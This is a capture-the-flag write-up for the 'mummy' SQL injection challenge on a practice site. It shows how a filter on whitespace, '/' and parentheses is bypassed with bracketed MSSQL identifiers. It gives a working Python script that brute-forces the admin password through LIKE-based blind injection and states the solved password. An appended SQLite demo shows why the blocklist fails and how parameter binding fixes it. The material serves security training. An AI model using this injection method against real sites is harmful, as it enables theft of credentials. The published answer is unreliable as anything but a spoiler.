# mummy

This is the first screen.

![](/files/-M-ndcXGMHV2i9nnor-t)

Because of the code below, the ASCII characters 0x01 \~ 0x20 are filtered, so no whitespace character can be used.

```php
for($i=0;$i<strlen($_GET['query']);$i++) if(ord($_GET['query'][$i]) <= 32) exit("%01~%20 can used as whitespace at mssql");
```

`/` is filtered as well, so the filter cannot be bypassed with `/**/` either.

`(` and `)` are also filtered.

Instead, use `[` and `]` to build the query without any whitespace, as shown below.

![](/files/-M-rBA23h5n9s_SVs4Fo)

The Python code looks like this.

```python
import requests
import string

URL = 'https://los.rubiya.kr/chall/mummy_2e13c2a4483d845ce2d37f7c910f0f83.php?query='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'Hello anonymous'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


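# Result of a run: 0c3cc245
def find_pw():
    pw = ''
    while True:
        found = False
        for character in string.printable:
            # Skip the LIKE wildcards (% and _), the quote, and characters that break the URL (# and &)
            if character in "#%&'_":
                continue
            # %25 is a URL-encoded '%': true when pw starts with the known prefix plus this character
            elif query("'1'from[prob_mummy]where[id]='admin'and[pw]like'{}{}%25'".format(pw, character)) is True: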
                pw += character
                found = True
                break
        if found is False:
            break
    print('pw: {}'.format(pw))


find_pw()
```

Running it shows that the pw is `0c3cc245`.

Visiting <https://los.rubiya.kr/chall/mummy_2e13c2a4483d845ce2d37f7c910f0f83.php?pw=0c3cc245> solves the challenge.

![](/files/-M-rCoMKxYkf9i5RtfuN)
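Why the character blocklist described above does not hold, and what does, as an added example (not part of the original write-up or the challenge's own code). It uses SQLite as a stand-in for MSSQL because both accept `[bracketed]` identifiers, and it assumes the filtered input is appended directly after `select`; the function names and the sample password are constructed.

```python
import sqlite3

# Constructed sample value; the real challenge data is not reproduced here.
SAMPLE_PW = "c0ffee00"


def blocklist_allows(fragment):
    """Filters named in the write-up: bytes <= 0x20, '/', '(' and ')'."""
    return all(ord(c) > 32 and c not in "/()" for c in fragment)


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE prob_mummy (id TEXT, pw TEXT)")
    db.execute("INSERT INTO prob_mummy VALUES ('admin', ?)", (SAMPLE_PW,))
    return db


def concatenated_lookup(db, fragment):
    # Assumed query shape: filtered input appended directly after SELECT.
    # Quotes and brackets already delimit tokens, so no whitespace is needed.
    if not blocklist_allows(fragment):
        return None
    return db.execute("select" + fragment).fetchone()


def bound_lookup(db, user_id):
    # Hardened form: the statement text is fixed and the input is bound as a
    # value, so it cannot add clauses no matter which characters it contains.
    return db.execute(
        "SELECT id FROM prob_mummy WHERE id = ?", (user_id,)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    frag = "'1'from[prob_mummy]where[id]='admin'and[pw]like'c%'"
    print(blocklist_allows(frag), concatenated_lookup(db, frag))
    print(bound_lookup(db, frag))
```

The blocklist only removes one way of separating tokens, while parameter binding removes the input's ability to become SQL syntax at all.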


